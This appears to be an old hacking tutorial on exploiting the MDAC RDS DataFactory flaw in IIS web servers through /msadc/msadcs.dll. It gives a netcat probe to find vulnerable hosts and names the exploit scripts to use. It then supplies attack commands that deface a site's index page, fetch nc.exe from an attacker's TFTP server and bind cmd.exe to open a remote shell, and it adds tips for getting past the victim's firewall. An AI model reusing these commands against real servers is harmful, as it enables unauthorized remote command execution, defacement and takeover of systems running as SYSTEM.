MDAC Local Command Execution



You might think that it is a years-old vulnerability; however, what I see on pen-tests is that almost 40% of IIS web servers are still vulnerable to this.
The MDAC (Microsoft Data Access Components) package installed with IIS has a vulnerability that lets an attacker submit commands for local execution on the web server.
The core problem is the RDS DataFactory object, reachable over HTTP through /msadc/msadcs.dll. By default it lets unauthenticated remote clients open database connections and run queries through the IIS server, and with the Jet ODBC driver those queries can call the VBA shell() function, so arbitrary commands get run. The commands run as the effective user of the IIS service, which is typically the SYSTEM account.
I won't get into details; if you want them, go and check RFP's web site. However, you can find a vulnerable site by connecting to the server and requesting the DLL by hand (replace target with the server's IP address):


c:\>nc -n -v -w 2 target 80
GET /msadc/msadcs.dll HTTP/1.0


and if the response comes back with the header


Content-Type: application/x-varg


then msadcs.dll is installed and the RDS DataFactory is exposed, so the server is most probably vulnerable if it has not been patched. A 404 means the component is not there at all. Note that a 200 with that content type only proves the handler is reachable; whether commands actually run depends on the patch level and on the RDS/Jet configuration, so confirm it with the exploit before reporting it.


You can find the exploit scripts, mdac.pl and msadc2.pl, on rain forest puppy's web site at www.wiretrip.net/rfp. The script checks for the vulnerability and, if the host is vulnerable, asks for the command you want to execute:


c:\> mdac.pl -h target


Please type the NT commandline you want to run (cmd /c assumed):


cmd /c


If, for example, you want to change the front page of the web site, which is located at


d:\inetpub\wwwroot\victimweb\index.htm


then you can type:

cmd /c echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm


or whatever you want, but my personal preference is to upload our Swiss army knife, netcat, and bind cmd.exe to port 80. To do that, set up a TFTP server that the victim can reach and put nc.exe in it. Then, when you are asked for the command to execute, type the following (replace attacker with the IP address of your TFTP server):


cmd /c cd %systemroot%&&tftp -i attacker GET nc.exe&&del ftptmp && attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe


There you go: fire your netcat at the victim on port 80 (nc target 80) and you get a shell, cmd.exe, running as the IIS service account. Bear in mind that IIS is already listening on port 80, so the bind may fail on a properly configured server; if it does, pick an unused port that the victim's firewall lets through.
